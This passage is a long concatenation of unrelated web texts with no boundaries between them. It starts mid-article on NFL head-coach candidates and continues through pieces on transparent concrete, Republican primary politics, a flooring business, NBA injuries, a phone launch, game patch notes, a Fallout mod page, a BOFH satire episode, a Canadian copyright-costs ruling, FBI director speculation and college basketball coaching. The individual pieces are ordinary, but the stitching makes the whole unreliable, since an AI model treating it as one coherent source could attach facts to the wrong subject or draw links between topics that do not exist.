Why he fits: Patricia, a trained aeronautical engineer, is one of the NFL's brightest minds and has had unquestioned success. Since he stepped in as defensive coordinator in 2012, the Patriots have given up the NFL's fewest points. Patricia has been calling the defensive plays since 2010. And like McDaniels, he has benefited from an entire NFL career of working under Belichick. Those who know him consider Patricia a tireless worker to whom players easily respond.
Why he doesn't: Like with any other defensive-minded coach, a limited offensive background will hurt Patricia on a Rams team that is motivated mainly by improving its lackluster offense. Patricia, however, did play center in college and called plays for the offensive line. If nothing else, interviewing Patricia is a very good way for the Rams to get feedback on their roster. Demoff sees this process as an ideal opportunity for that.
Kyle Shanahan
Age: 37
Current title: Falcons offensive coordinator, two seasons
Prior roles: Browns offensive coordinator (2014) ... Redskins offensive coordinator (2010-13) ... Texans offensive coordinator (2008-09) ... Texan quarterbacks coach (2007) ... Texans wide receivers coach (2006)
Why he fits: He isn't the game's most coveted offensive coordinator for nothing. In nine seasons in that role, Shanahan -- son of Super Bowl-winning coach Mike Shanahan -- has guided six top-10 offenses. He made Griffin the Offensive Rookie of the Year, helped turn Matt Schaub into a Pro Bowl quarterback and has made Matt Ryan an MVP front-runner this season. Under Shanahan, the Falcons scored an NFL-leading and franchise-record 540 points in 2016. His scheme -- a wide-zone running game, which would require quick reads from Gurley, and lots of play-action -- is appealing to the Rams' personnel.
Why he doesn't: It might take a while to grasp Shanahan's offensive concepts, as evidenced by the Falcons' disappointing showing in 2015. There are also the usual questions about assembling a staff and leading a group that come with your typical rookie coach.
Mike Vrabel
Age: 41
Current title: Texans linebackers coach, three seasons
Prior roles: Ohio State defensive line coach (2012-13) ... Ohio State linebackers coach (2011)
Why he fits: Vrabel has far more playing experience than anybody on this list, having spent 14 years as a linebacker for the Steelers, Patriots and Chiefs. After his playing career ended, Vrabel rose quickly as a coach, spending three years coaching linebackers and defensive linemen at his alma mater and then spending three years coaching linebackers for the Texans, where he helped develop Jadeveon Clowney and Benardrick McKinney. Now he's getting coaching interviews. Vrabel is considered an excellent teacher and motivator.
Why he doesn't: He is seen in some circles as a potential head coach, but that is probably still years away. Vrabel has only ever been a position coach and has no experience as a coordinator. He needs that responsibility first, which is why it was surprising to see the Rams request an interview in the first place. They may see him as a potential replacement for departed defensive coordinator Gregg Williams, who is now in Cleveland.
Steve Wilks
Age: 47
Current title: Panthers assistant head coach and defensive backs coach, two seasons
Prior roles: Panthers defensive backs coach (2012-14) ... Chargers defensive backs coach (2009-11) ... Bears defensive backs coach (2006-08)
Why he fits: Wilks has spent a lot of years working under Ron Rivera, most recently helping with scheduling and planning, so he is familiar with the logistics of a head coach. He has also done a lot in the secondary despite having very little in the way of draft picks and free agents, most notably leading a Super Bowl-caliber group that led the NFL in interceptions in 2015.
Why he doesn't: Wilks, like Vrabel, still needs experience as a coordinator. He is reportedly next in line with the Panthers if current defensive coordinator Sean McDermott lands a head coaching job this offseason. That is the natural next step.
When it comes to showing off unusual materials, you could do worse than transparent concrete and cement. Both are solid and strong, yet allow light to pass through them, causing a cartoon question mark to pop up over people's heads the first time they see the stuff.
At this year's World Expo in Shanghai, Italy took the opportunity to build their pavilion out of transparent cement (above), whereas Germany is displaying--if not using--transparent concrete (below) in their structure.
Both materials are strong and allow light to travel through them, but what are the differences? Italy's product, called i.light and manufactured by Italcementi, has a "higher transparency performance than the optical fibres experimentally used in this field, but also cost much less allowing for their application on a large scale," says an Italcementi researcher. Meanwhile Germany's product, called Lucem and manufactured by Robatex GmbH, is 100% recyclable, and is on display in 2cm-thick sheets.
Bragging rights have to be awarded to the Italians: They've put their money where mouths are and incorporated nearly 4,000 i.light blocks, each 1m x 50cm x 5cm thick, in their structure.
via tech on
Ted Cruz is hoping for a win in his home state of Texas on Super Tuesday. | AP Photo Cruz's U.S. territories consultant backs Trump
Ted Cruz's man in the U.S. territories has decided to support Donald Trump, he told POLITICO on Sunday.
Dennis Lennox, a Michigan-based GOP operative who spent several weeks organizing the U.S. territories for Cruz, including Guam, American Samoa and the Northern Mariana Islands, said he is supporting Trump because he sees him as more electable.
"I respect Sen. Cruz immensely, I just believe at this point, Mr. Trump is better-positioned, because of his stance on trade, to put Democrats on the defensive in states like Michigan, Pennsylvania and Wisconsin, and ensure that Republicans win again," he said.
Those remarks come as Cruz and the rest of the GOP field grapple with a front-runner who appears to be putting potentially insurmountable distance between himself and his rivals. Earlier Sunday, Trump notched the support of Alabama Sen. Jeff Sessions, whom Cruz had counted as an ally.
Lennox, whose work with the Cruz campaign didn't extend beyond the territorial organizing, doesn't have plans for an official role with the Trump campaign, but said he would aim to help Trump at the Conservative Political Action Conference later this week, as well as in Michigan.
"I'm not in it for titles or a job. I'm it in to win -- something Republicans haven't been too good at for a while," he wrote in an email.
A Cruz source said Lennox was hired "for a project that was completed at the end of the summer and hasn't been with us since."
The campaign is still competing in the U.S. territories as they hunt for delegates; on Friday the campaign announced campaign chairmen in each of the five territories.
Don't mess with this little guy—or his big sister.
Bristol Palin leapt to her brother's defense Tuesday after celebrating World Down Syndrome Day on her social media. The mother of two shared a photo of her youngest sibling, Trig Palin, who was smiling into the camera while wearing a knit hat that read "Make America Great Again!," Republican presidential candidate Donald Trump's famous campaign slogan.
"World Down Syndrome Day!!" she captioned a photo of her 7-year-old brother on Instagram. "I don't know how our family got so lucky to have this handsome boy light of our lives without a doubt #theluckyfew #TrigPaxson #T21 #mybrotherhasmorechromosomesthanyou"
Fans of the former Dancing With the Stars competitor gushed over Trig's sweet smile and offered words of encouragement. However, one user didn't take too kindly to his beanie hat.
"Yep that's Trumps target demographic," the user, who is a nursing student, remarked.
For SVENNESS episode 3.4 we travel to the Koppenberg Cross in Oudenaarde, Belgium. The B-Post Trophy race uses the same cobbled climb, the Koppenberg, that features in the Tour of Flanders, but here it is more of a respite than a launching pad. The Koppenberg Cross is all about climbing and descending and those who excel at those skills will have the advantage. We concentrate on cornering on descents, riding mud, race strategy and a controversial finish.
SVENNESS 3.4 is brought to you by Skills, Drills and Bellyaches: A Cyclocross Primer. Check it out at cyclocrossbook.com.
Video is via Sporza: http://sporza.be/cm/sporza/wielrennen/veldrijden
Music for this episode is all available for purchase directly from the artist through BandCamp.
Playlist:
I Am The Sea~The Bloody Oranges: thebloodyoranges.com/track/i-am-the-sea
Dead Wrong~Somos: somos.bandcamp.com/track/dead-wrong
Rats~Kill Chaos: fieldrecords.bandcamp.com/track/rats
Radio Silence~Cosmonaut: cosmonautnyc.bandcamp.com/album/radio-silence-7
I Want To Waste Away With You~Sports Bar: wearesportsbar.bandcamp.com/album/i-want-to-waste-away-with-you
Bending Ober Backwards~High-Tails: hightailsband.bandcamp.com/track/bending-over-backwards
Money~Mystery Skulls: mysteryskulls.bandcamp.com/track/money
Big Hearts~The Swellers: nosleepsampler.com/track/big-hearts
Thanks for watching.
http://www.heartpine.com/
Great business ideas often come from strange places, but no one expects to find one at the bottom of a river. Yet that's what happened to George Goodwin. When he went fishing in shallow Florida riverbeds during the early 1970s, Goodwin often caught more logs than bass. "I used to snag my lures on them," he remembers. Most fishermen would have cursed their luck; Goodwin, now 59, reeled in a multi-million-dollar business instead.
What Goodwin found are known as deadhead logs. In the 1800s loggers felled centuries-old cypress and pine throughout the South for use in construction. They would float the logs downstream to the nearest mill, but often the heaviest logs--those filled with the most resin--sank to the muddy riverbed. At a time when the South was blanketed by tens of millions of acres of untouched forest, it wasn't much of a loss. But today overharvesting has reduced that old-growth forest to just 5,000 to 10,000 acres, most of it protected, and the logs once lost to the rivers have newfound value.
As Goodwin got interested in logs, he discovered that, although the outside decomposes after being underwater for nearly a century, resin keeps the inside perfectly preserved. Prized for flooring and paneling, this interior wood is known as "heart pine" and "heart cypress."
Goodwin spent $105,500--his entire savings--to purchase 20 acres of land in Micanopy, Fla., ten miles south of Gainesville, and move an old sawmill to the property, where he and his wife, Carol, the company's 59-year-old vice president, live and work. They pay divers $2 to $3 per board foot of wood in the logs recovered from Florida riverbeds. Then they clean up the logs and mill them into flooring that sells for $5 to $20 a foot. Carol estimates that the demand for antique wood has risen tenfold in the past decade, thanks to the housing boom and changing tastes. That has sent the company's annual revenue on a steady climb, from $5,000 in 1977 to $3 million in 2004.
By last year their company had 25 employees and enough cash flow to take out a $140,000 loan to build a 15,000-square-foot warehouse for the nearly two million board feet of wood it has in inventory. That saved a lot of aggravation when several hurricanes tore through the area just months after the building had been completed. (The Goodwins were unaffected by Katrina and Wilma.) Had the logs been soaked, the company would have had to spend months drying them out.
Goodwin Heart Pine has supplied flooring for the homes of celebrities such as Paul McCartney, Morgan Freeman, and Ted Turner. The wood is also popular for historical sites, including the Ernest Hemingway Home and Museum in Key West, Fla. Six years ago the termite-infested flooring in the 150-year-old structure needed replacing. "Goodwin flooring was the closest to what Hemingway had originally," says Hemingway Home event director Linda Mendez.
The growing popularity of antique wood, however, has more would-be entrepreneurs flocking to the business, not all with the best intentions. "There's a joke in the South that anyone with a pickup sells a little bit of heart pine," says Carol Goodwin. "But you never know what you're getting." Because there are no up-to-date guidelines on what constitutes heart pine--the most recent standards were published in 1924--unwitting customers may purchase heart pine from younger trees, which is not nearly as dense and durable as what the Goodwins sell.
When a hurricane knocks down any of the remaining old-growth forest--as happened last year--the Goodwins often buy that wood. They also buy and resell antique heart pine salvaged from old barns and buildings. Branching out from flooring, George and a local cabinet-maker have teamed up to craft and sell a line of wood furniture. In July the Goodwins opened a showroom in Palm Coast, Fla., for both their furniture and flooring.
While George Goodwin jokes that "cashing the checks" is one of his favorite parts of the business, he loves the other parts more than he lets on. "If George had $1 million in the bank, he'd just go and buy more wood," says Carol, laughing.
Forbes Small Business Magazine
The Real Wood Bible: The Complete Illustrated Guide to Choosing and Using 100 Decorative Woods
Alan Anderson, center, hasn't played a game for the Wizards yet. (Photo by Toni L. Sandys/ The Washington Post)
CLEVELAND – Alan Anderson joined the Washington Wizards on Monday for their trip to Cleveland and took shots after his teammates completed shoot-around Tuesday morning. The 33-year-old swingman also said he plans on taking part in on-court activity on Wednesday for the first time since undergoing surgery on his left ankle on Oct. 13.
It's significant progress for Anderson, who hasn't played for the Wizards, or even joined them on road trips, since signing a one-year deal to join the team over the summer. He had been limited to cardio exercises and cheering on his teammates enthusiastically from the end of the Wizards' bench at home games.
Positive news has been scarce for the Wizards over the last week. They're stuck in a four-game losing streak, injuries have ravaged their bench and their challenging early schedule isn't getting any easier with a matchup against the first-place Cavaliers on Tuesday night at Quicken Loans Arena.
[Wall shoulders responsibility for Wizards' early struggles]
The Wizards haven't given an official timetable for Anderson's return, but mid-December was the original estimate and Anderson appears in line to make his Wizards debut around then.
Washington signed Anderson to a deal worth $4 million believing he would recover from an ankle surgery he underwent in May well before the season started, but discomfort persisted during training camp. The decision was then made to have a second procedure on the ankle to remove a bone fragment left behind in the first surgery.
When he does return, Anderson will provide a much-needed defensive presence and depth. Washington had just 10 available players in its loss to the Toronto Raptors on Saturday, which prompted the team to waive swingman Martell Webster and sign center Ryan Hollins on Monday.
[Wizards add Hollins in effort to bolster front-court depth]
Nene (calf) and Gary Neal (groin) didn't make the trip to Cleveland, while Drew Gooden III (calf) is with the team but is not expected to play Tuesday night.
Xperia Z Ultra LTE starts shipping in UK on 13 September
Most of the recent headlines have been dominated by the Xperia Z1, yet Sony has another premium handset that is to launch in Europe shortly, the Xperia Z Ultra. The HSPA+ version (C6802) has been out for a number of weeks now and the LTE version (C6833) is due to go on sale next week in the UK.
All retailers that we've checked including Amazon UK, Clove, Handtec and Unlocked Mobiles point to a shipping date of Friday 13 September. Interestingly, the pricing between the Xperia Z Ultra and Xperia Z1 is not the different, with the former costing just £20 more on most sites. This is despite the Xperia Z Ultra sporting a larger 6.44-inch display compared to the 5-inch Xperia Z1. Clove has the best pre-order deal, bundling the SmartWatch 2 and SBH20 Bluetooth Stereo Headset into the price of £618 including delivery.
League of Legends and PVP.net will be updated during scheduled downtime (http://www.leagueoflegends.com/board/showthread.php?t=79829) on 3/24.
New Skins in the Store
Red Baron Corki
Mr. Mundoverse
Yellow Jacket Shen
Frozen Shen
PVP.net v1.08.10
Several optimizations have been made resulting in quicker login, load times, and page transitions
Added an option to turn off the login screen animations
Added an option to turn off the page transition animations.
Fixed a bug where you could see other player's IP/XP rewards from their recent games.
The Play button is now orange instead of blue to help new users reach the Play Game menu.
Players who are logged out by Customer Support will now receive a message indicating that their account is under review.
Fixed several bugs related to leaving at the end of Champion Selection
League of Legends v1.0.0.81
Vorpal Blade  Hits a target enemy for magic damage, and marks the target for allies to see. Allied units that attack the marked enemy target get healed over several seconds.
Feint - Shen defends against the next champion attack or spell, blocking much of the damage from it.
Shadow Dash - Shen dashes towards target location, taunting enemies he passes through.
Stand United (ultimate) - Shen places a shield on himself and on a target ally which absorbs damage. After channeling for several seconds, Shen teleports to the target ally.
Ki Strike (passive) - Every 8 seconds, Shens next attack deals bonus damage based on his max health. Being attacked by enemy champions makes this passive occur more frequently.
Stats: Base Armor increased to 15 from 12 Base Damage increased to 49 from 47 Base Mana Regeneration increased to .9 from .8 Movement Speed increased to 305 from 300
Mystic Shot base damage increased to 40/65/90/115/140 from 40/60/80/100/120
Essence Flux missile width increased to 120 from 100
Arcane Shift the closest unit targeting range increased to 750 from 650
Arcane Shift mana cost reduced to 90 from 100
Rising Spell Force duration increased to 6 from 5
Fixed a bug in which Barrel Roll would detonate Teemo's mushrooms.
H-28G Evolution Turret (remake) Green turrets now spawn at level 3 and 4 of this skill, reducing Armor and Magic Resist on hit. Red Turrets spawn at level 5 and cause area of effect damage on hit. Turrets damage increased to 28/36/44/52/60 from 20/26/32/38/44 Turrets now attack 50% faster for the first 6 seconds after placement Max turrets lowered to 1/2/2/3/3 from 2/3/4/5/6 New missile particles added for green and red turrets
Hextech Micro-Rockets Cooldown reduced to 10 seconds at all levels from 20 Rockets now hit the 3 nearest enemy minions or Champions, instead of just Champions Fires 3 rockets at all levels Ability Power Coefficient reduced to 0.55 from 0.8 to accomodate the significant cooldown reduction Base damage reduced to 85/135/185/235/285 from 90/150/210/270/330
UPGRADE!!! (remake) UPGRADE!!! retains the 10/15/20% cooldown reduction passive On activation, all existing Evolution Turrets are healed for 100% of their max hit points. In addition, all existing Evolution Turrets begin fire 20/25/30% movement slowing missiles for 10 seconds. Mana cost 90 at all levels Cooldown is 120/105/90
New "Choose Me" voice over in PVP.net
Puncturing Taunt now displays the "Taunted!" pop up text for enemies
Increased the range on Two-Shiv Poison's active to 625 from 600
Flash range reduced to 425 from 475
We've made networking optimizations in order to reduce the lag and latency for some players. In addition, the particle system has been improved to provide better performance for some machines in areas that have a high density of particles. This is most noticeable near the top of Twisted Treeline, but general performance should also improve.
Asset use permission in mods/files that earn donation points You are not allowed to earn Donation Points for your mods if they use my assets
You are not allowed to use assets from this file in any mods/files that are being sold, for money, on Steam Workshop or other platforms
Asset use permission in mods/files that are being sold You are not allowed to use assets from this file in any mods/files that are being sold, for money, on Steam Workshop or other platforms
You must get permission from me before you are allowed to use any of the assets in this file
Asset use permission You must get permission from me before you are allowed to use any of the assets in this file
You must get permission from me before you are allowed to modify my files to improve it
Modification permission You must get permission from me before you are allowed to modify my files to improve it
Includes 5 Barrels that significantly alter firing mechanics, 6 Internal Cores that alter the charge-up, a working tactical flashlight, along with a ton of different scopes, stocks and slides! Also includes an improved palette system with 30 colors, 4 patterns, and 2 traditional retextures. There's even some LORE hidden in the world.
(Watch the video to hear the custom sounds!)
In-World Locations:
Show Fort Strong, in the General's office. Terminal in the cubicle area.
West Boston Federal Survallence Center (Abandoned shack in Glowing Sea), New room near elevator. Terminal in same room.
The institute, Advanced Systems Firing range. Spoiler:
AMMO is crafted at CHEMLAB, trade 100 plasma cartridges and a fusion core for 100 Plasma Cores
Community Videos:
(Watch the video to hear the custom sounds!)In-World Locations:AMMO is crafted at CHEMLAB, trade 100 plasma cartridges and a fusion core for 100 Plasma Cores
Version notes:
.94a
.93a
.92a
.91a
.90a
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™
Installation:
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™
(Please keep screenshots SFW according to
﻿ Screenshot auto-approve is turned on, feel free to add your own!(Please keep screenshots SFW according to Nexus content guidelines ﻿)
™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™
Links to other CROSS projects:
Added New barrel type: Standard Amp-Standard Amp Increases the damage and explosion size of standard shots.-Adds 1 second of charge time.-Adds 25 direct damage and 10 energy damage to help with the standard shot's weak scaling.-Total of +35 direct hit damage, and +10 explosion damage (before perks).-Uses a new unique model.Added new barrel type: Arc Cannon Mk.II-Direct upgrade to the Arc Cannon.-Adds a chain effect to shots that can hit multiple targets.-Build cost requires a significant investment of Nuclear Materal.Added a new sight type: Reflex w/ Holo + Targeting Hud-New top end reflex sight that uses reworked targetting hud effect.Reworked the automatic cores-Recircular Core is no longer fully automatic, still uses rifleman perk.-Dual Core now uses the Commando perk and has increased firing speed to go with its full auto.Removed leveled list records, the weapon is now added to leveled lists via a script.Added a category specific to the PlasRail for the Cyberlab. (if you have cybernetics, not required)Added an Ammo crafting recipe for the Cyberlab (if you dont like crafting stuff at the chemlab).Slight damage nerf (-25 energy damage) to the Arc Cannon.Reworked the targetting Hud effect:-Highlights target in green instead of red.-Minor drain on AP while aiming (4 per second).Standardized the Core type Synths can spawn with.-This is to prevent them from winning the RNG lotto and spawning with a godlike combo of mods.Minor edits to original textures to fix some color inconsistancies.Added Chrome Style-Uses index colors-Works best on darker colorsSwapped some firing sounds around a little bit-Standard barrel and Disc barrel were swappedAdded Disc Launcher Mk.II Barrel-This removes the tracking mechanic, but vastly improves the speed of the disc projectile (1800 to 6500)Fixed some spelling errorsAltered the impact force of some projectiles.Altered the charging noise to be less noisy and grindy.-due to how some weapon sounds work this unfortunately must effect the Gauss rifle.-The change involves the loop of the charge sound, as well as a more even toned falloff sound effect.-This may even be an improvement if you dislike the Gauss rifle's grinding noise when it charges.Added higher resolution normal maps.-Release
Episode 16
We have new Director, just in time for Christmas!
It appears that, through some convoluted twist of fate, our former Director took a dagger in the back for "creating a hostile workplace environment". APPARENTLY his misogynistic leanings "fostered a culture of a male hierarchal structure" and he's been made an example of by H.R., who didn't want the finger pointing in their direction.
I must remember to send Gina some flowers for that. That said, whilst I support anything that moves IT detritus further downstream to the scrap-heap, the claim is a little OTT.
"What do you mean, OTT," the Boss asks defensively, if only because he smells a potential Christmas promotion in the offing.
"Look at an IT area – pretty much ANY IT area – odds are 95 per cent of them are men!" I blurt.
"I don't think that's right," he says, distancing himself from any potential outrage.
"No, I'm not saying that women can't do the job" I counter. "I'm just saying they're not sad enough to want to do it."
"What do you mean?"
"Women – as a sweeping generalisation you understand – often have lives. Vast numbers of men, on the other hand do not."
"I..."
"Do you know what Gina's doing this weekend?" I ask.
"Uhh... no?"
"She's popping back to France to hand-pick her Christmas champagne from the producer in Champagne; stopping off with some mates for spritz and strawberries with imported strawberries – and heat lamps – to make it feel like summer."
"I see."
"And you know what I'm doing this weekend?"
"Gina?" the PFY chips in, undermining my standpoint somewhat and unknowingly adding his name to the top of my Christmas kicking list.
"No. I will be watching all three seasons of Deadwood, followed by all four seasons of Arrested Development, and possibly the BBC versions of Tinker Tailor Soldier Spy and Smiley's People - if time allows. I expect to indulge in the epicurean delights of a chicken jalfrezi and lager. For breakfast, lunch and dinner. I may not even leave my house."
"And your point is?"
I put on my poker face. "There was no point, I was just bragging."
"I thought this was something to do with not having a life?" the Boss chips in.
"Oh, we can talk about you later."
"So you don't think your life is sad?" the Boss asks.
"Did you not hear chicken jalfrezi? From Khan's in Bayswater? I'M LIVING THE DREAM!"
I may have shot my argument in the foot there a little; I'm not too sure, as I think I may be having a curry rush.
"So have you heard anything about the new director position?" the Boss asks greedily. "Have they advertised the role yet?"
"From what I understand they've contracted out the appointment of a new director to some HR firm which specialises in difficult appointments where a change of culture is required," the PFY says.
"I wonder who that'd be?" the Boss asks.
"Gina Barker, Lightfoot, Barker and Ellice" Gina says, appearing out of nowhere.
"I..." the Boss burbles.
"Tea, milk, one sugar" Gina says.
"Uh, I'm the acting director until such time as an appointment is made."
"So you'd like me to make it because I'm a woman?"
Before we know it the Boss is back with a tray of hot drinks. Honestly, it's like watching a magician at work. Even though you're watching you still can't work out how it's done. Like how that cup of scalding hot tea ended up in the PFY's lap. Magic. I scratch his name off the Christmas kicking list as Gina apparently prefers to do her own work.
"So what are we looking for in a director?"
"IT savvy," the PFY says, once he's tipped half a water cooler down his front, "but not so much that they think they're smart enough to make decisions based on their 10 year old technical knowledge."
"Must be able to work as part of a team," the Boss babbles, jockeying for position.
"Should be able to sign a purchase order without unduly delaying the purchase process by reading it first," I add.
"Should be able to work well with all genders, religions and nationalities - as I myself do," the Boss adds.
"Should be able to insulate technical people from idiotic management decisions," the PFY snaps.
"Has an open door policy to staff wishing to improve the company's image," the Boss fires back, pointing at his door.
"So if I can stop you there... in basic terms you want someone with enough IT skill to get the job done, not get in the way and to smooth over any tricky issues that might arise in the interface between IT and the rest of the company?"
"Exactly!" the Boss exclaims, closing his meeting diary and gesturing us to the door. "I think you've got a perfect handle on it. Simon tells me that you're going to Champagne this weekend, and it just so happens that my brother-in-law has an interest in a place in Troyes. Perhaps I could give you his number and he might be able to put you in touch with some people?"
Gina, disappointingly, seems quite taken by this idea, which disturbs me somewhat. That said, I'm sure her professionalism and idiot detection will win out.
...
Barely a day later the PFY and I are called into a quick meeting with the head of HR. Gina and the Boss are there already, along with the overpowering smell of rodent.
"So we considered all the issues that you raised," Gina said, "and when we went out to the market we didn't really find all the characteristics you were looking for in one candidate. However, we've had some very fruitful discussions and are now able to make an appointment of a new director."
The Boss couldn't look smugger if he'd stolen my chicken jalfrezi.
"Gina Barker, formerly of Lightfoot, Barker and Ellice," Gina says.
I think the Boss, the PFY and I have just been put on the Christmas kicking list...
The Federal Court has issued its ruling on the costs in the Voltage – TekSavvy case, a case involving the demand for the names and address of thousands of TekSavvy subscribers by Voltage on copyright infringement grounds. Last year, the court opened the door to TekSavvy disclosing the names and addresses, but also established new safeguards against copyright trolling in Canada. The decision required Voltage to pay TekSavvy's costs and builds in court oversight over any demand letters sent by Voltage.
The issue of costs required another hearing with very different views of the costs associated with the case. TekSavvy claimed costs of $346,480.68 (mainly legal fees and technical costs associated with complying with the order), while Voltage argued the actual costs should be $884. The court disagreed with both sides, settling on costs of $21,557.50 or roughly $11 per subscriber name and address. The decision unpacks all the cost claims, but the key finding was that costs related to the initial motion over whether there should be disclosure of subscriber information was separate from the costs of abiding by the order the court ultimately issued. The motion judge did not address costs at the time and the court now says it is too late to address them.
That approach seemingly does not reflect how the parties viewed the case given that this was an unprecedented action. With TekSavvy now bearing all of those motion costs (in addition to costs associated with informing customers), the decision sends a warning signal to ISPs that getting involved in these cases can lead to significant costs that won't be recouped. That is a bad message for privacy. So is the likely outcome for future cases (should they arise) with subscribers left with fewer notices and information from their ISP given the costs involved and the court's decision to not compensate for those costs.
The big question now is whether Voltage will proceed with the case. Given their expense to date, they will likely pay the costs and obtain the names. However, they must be committed to going to court over the claims, since the court made it clear that merely sending threats would be viewed as copyright trolling for future claims. Yet with the cap on liability for non-commercial infringement, the further costs of litigating against individuals, the actual value of the works, and the need to obtain court approval on demand letters, it is hard to see how this is a business model that works. Indeed, that is what the court initial noted, stating that “damages against individual subscribers even on a generous consideration of the Copyright Act damage provisions may be miniscule compared to the cost, time and effort in pursuing a claim against the subscriber.”
Further, the market has shifted in Canada with rights holders using the new notice-and-notice system to accomplish much the same thing. Their personal information is not disclosed but the demands for payment still make it through to the subscriber. That has left Canadians facing a barrage of notices and demands for settlements. It points to why the government needs to address the costs and loopholes in the notice-and-notice system, which is now being used to circumvent the courts by pressuring subscribers to pay settlement demands with ISPs bearing all the costs of forwarding notifications.
TRENTON — Could Gov. Chris Christie's ticket out of Trenton be to replace fired FBI director James Comey?
The governor's name has appeared on several lists of possible choices President Donald Trump could consider to be the next director of the FBI following the sudden dismissal of Comey on Tuesday, which the president said was necessary to restore "public trust and confidence" in the FBI.
Trump in a tweet on Wednesday morning said Comey had lost the confidence of both Democrats and Republicans."When things calm down, they will be thanking me," Trump tweeted.
Comey had come under intense scrutiny in recent months for his public comments on an investigation into Democrat Hillary Clinton's email practices, including a pair of letters he sent to Congress on the matter in the closing days of last year's campaign.
The FBI sent a letter to Congress on Tuesday correcting the record on Comey's testimony on Huma Abedin, a top aide to Hillary Clinton, explaining he misspoke when he said Abedin had forwarded "hundreds and thousands" of emails to the laptop of her husband, former Rep. Anthony Weiner.
The FBI says only a small number of the emails found on the laptop were a result of forwarding. Most occurred as a backup from other electronic devices.
Christie, an early supporter of Trump's candidacy for president after ending his own run in 2016, was considered to be a possible choice to be named Vice President after Trump locked up the nomination, or U.S. Attorney General when Trump was selecting his cabinet.
The Associated Press , CNN and Fox News said Christie's time as U.S. Attorney for New Jersey gives him a strong law enforcement background for the FBI job, which carries a 10-year term. Christie played up that background during the 2016 presidential campaign with calls to prosecute Clinton for her personal email server use.
Christie stepped down as state Attorney General to run for governor in 2009.
Trump tweeted that Comey's replacement will be "someone who will do a far better job, bringing back the spirit and prestige of the FBI."
Since Trump was elected in November, Christie has said on many occasions he was not interested in a top White House position because he wanted to focus on completing his second and final term as governor. Trump named him in March to lead a presidential panel on opioid and drug addition, a subject that has been a top issue with Christie.
During last month's "Ask the Governor" on New Jersey 101.5, however, Christie said he has been in contact with Trump and has been critical of Trump's inner circle of advisers following the early defeat of his proposed health care bill and the first travel ban on Muslim-majority countries.
Other possible FBI Director candidates include former NYPD Commissioner Ray Kelly, former New York Mayor Rudy Giuliani, South Carolina Congressman Trey Gowdy, Milwaukee County Sheriff David Clarke, former Deputy FBI Director John Pistole, and Acting FBI Director Andrew McCabe.
Trump is likely to reach outside the bureau to find someone to run the storied law enforcement agency.
"The FBI is one of our nation's most cherished and respected institutions, and today will mark a new beginning for our crown jewel of law enforcement," Trump said in a statement issued by the White House.
Contact reporter Dan Alexander at Dan.Alexander@townsquaremedia.com .
More from New Jersey 101.5:
The SI.com Successor Series will examine who might replace some of the biggest head-coaching names in college basketball when they inevitably leave their posts. It is intended as pure speculation -- fodder for discussion in the long hoops offseason. That said: Down the line, we reserve the right to claim we knew it all along.
Bo Ryan, Wisconsin
Record: 704-224 (351-148 Division I, 353-76 Division III)
NCAA titles: None in Division I. Four in Division III (1991, 1995, 1998, 1999)
During this past season's NCAA tournament, Bo Ryan recalled the grueling job interview that landed him at Wisconsin. Then-athletic director Pat Richter called Ryan, who at the time was coaching down the road at Wisconsin-Milwaukee. Richter asked Ryan if he was ready. Ryan replied, "Yes." End of interview.
Since then, the Badgers haven't missed the NCAA tournament – going 13-for-13 under Ryan since 2001-02 – and haven't finished lower than fourth in the Big Ten. Last April Wisconsin advanced to the Final Four for the first time under Ryan, 66, and it wouldn't be a shock to see it make a repeat appearance next spring. Ryan's astounding consistency has elevated the program to an elite plane, and that will increase the urgency in replacing him whenever he decides to move on.
It's setting up as an intriguing dynamic for athletic director Barry Alvarez, who inherited Ryan in 2004 and whose next men's basketball hire will be his first. There are big names to pursue. Or like Richter before him, Alvarez could call a relatively unheralded candidate – maybe someone already on the Wisconsin payroll – and hope the guy on the other end is as ready as Ryan was.
If Ryan left tomorrow
Tony Bennett, Virginia head coach. Bennett is a Wisconsin native who played at Wisconsin-Green Bay and then coached as an assistant in Madison from 1999-2003 – both for his father, Dick, and then under Ryan when the latter took over the program in 2001. And he just led Virginia to a 30-win season that included both the ACC regular season and conference tournament titles. It goes against all logic to imagine the 45-year-old Bennett not getting a call. Wisconsin's success under Ryan is due in part to his assistants, but it also might tilt the search toward more experienced candidates with winning track records. The Badgers were machine-like on offense a year ago (ranking fourth in the nation in adjusted efficiency, per kenpom.com), but it's not like the fan base would recoil when it sees Bennett's low-tempo basketball. He just inked a seven-year contract extension with Virginia, but you would have to expect he would be in the mix right now, and he certainly will be later on if his success continues.
Greg Gard, Wisconsin associate head coach. Gard is ready for a head coaching gig somewhere, but as he enters his 21st consecutive season working under Ryan, he might be waiting patiently to receive the baton from him in Madison. Gard has been the associate head coach since 2008 and also serves as recruiting coordinator, which means he's more significant to the Badgers' sustained success than anyone besides Ryan. That success could also work against him, though. Would more Final Four runs convince the higher-ups that the program has become too big to hand to someone who hasn't run a team before?
Tod Kowalczyk, Toledo head coach. Everyone might be a long shot after Bennett and Gard, but Kowalczyk could be an attractive option. He's a De Pere, Wis., native who played at Minnesota-Duluth and has jumpstarted two programs as head coach: First Wisconsin-Green Bay, which went from 10-20 in his debut season of 2002-03 to consecutive 22-win campaigns in '09 and '10, and then Toledo, where the Rockets went from 4-28 in his inaugural campaign of 2010-11 to 27-7 this past season. If Wisconsin is looking for head coaching experience and the shoot-the-moon candidates decline the advances, it's pretty evident the 48-year-old Kowalczyk should be in the mix.
Long shots and long-range plans
Shaka Smart, VCU head coach. Wisconsin has a potential trump card in this one: Smart grew up within the Madison city limits. That said, Marquette came calling this offseason and Smart met with the decision-makers who were seeking Buzz Williams' replacement and still waved off the opportunity to return to his home state. Maybe the Big Ten is big enough to pull at Smart's heartstrings, and one has to imagine Alvarez will at least call. Another factor in computing how likely this is: Smart might have to change Wisconsin's recruiting dramatically to implement his high-pressure “Havoc” defense, or alter his preferred system entirely.
